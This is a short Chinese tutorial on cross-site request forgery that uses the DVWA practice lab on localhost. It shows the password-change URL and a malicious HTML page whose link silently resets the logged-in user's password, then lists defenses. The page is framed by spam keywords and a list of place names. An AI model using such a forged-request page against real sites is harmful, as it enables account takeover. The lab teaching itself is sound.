91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

簡述CSRF請求跨站偽造

發布時間:2020-10-23 22:50:17 來源:網絡 閱讀:917 作者:天道酬勤VIP 欄目:安全技術

首先什么是CSRF:


簡述CSRF請求跨站偽造


如圖:

    1,用戶通過瀏覽器正常訪問帶有CSRF漏洞的網站。


        如我去訪問http://127.0.0.1:8080/DVWA/login.php

        簡述CSRF請求跨站偽造


        我們登錄進去賬號是:admin 密碼是:password,找到一個修改密碼的地方

        簡述CSRF請求跨站偽造

        修改密碼為123456,修改的url是:

        http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/password_new=123456&password_conf=123456&Change=Change#

        簡述CSRF請求跨站偽造

        

    2,我們構造惡意網站B將代碼保存為index.html

<html>
	<head>
	
	<title>這是惡意網頁</title>
	</head>
	
	<body>
	<h2>這是惡意網頁<h2>
	<a href="http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">***</a> 
	
	</body>

</html>

        我們訪問網站B:點擊***

        簡述CSRF請求跨站偽造

     

        我們可以看到密碼被改了(改成了password)

        簡述CSRF請求跨站偽造


防御:

   1.盡量使用POST,限制GET

   2.瀏覽器Cookie策略

   3.Anti CSRF Token




微信公眾號:

簡述CSRF請求跨站偽造


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

颍上县| 会宁县| 隆子县| 苍山县| 凌云县| 来宾市| 洛宁县| 饶阳县| 高陵县| 滨州市| 平谷区| 阿拉善右旗| 巴塘县| 南漳县| 鹿泉市| 元阳县| 巴彦淖尔市| 庆云县| 宽甸| 含山县| 井研县| 龙海市| 大理市| 安平县| 沭阳县| 阳山县| 犍为县| 阳春市| 平舆县| 全南县| 兴化市| 岱山县| 抚松县| 开原市| 类乌齐县| 双柏县| 浠水县| 文安县| 乐山市| 五寨县| 晋中市|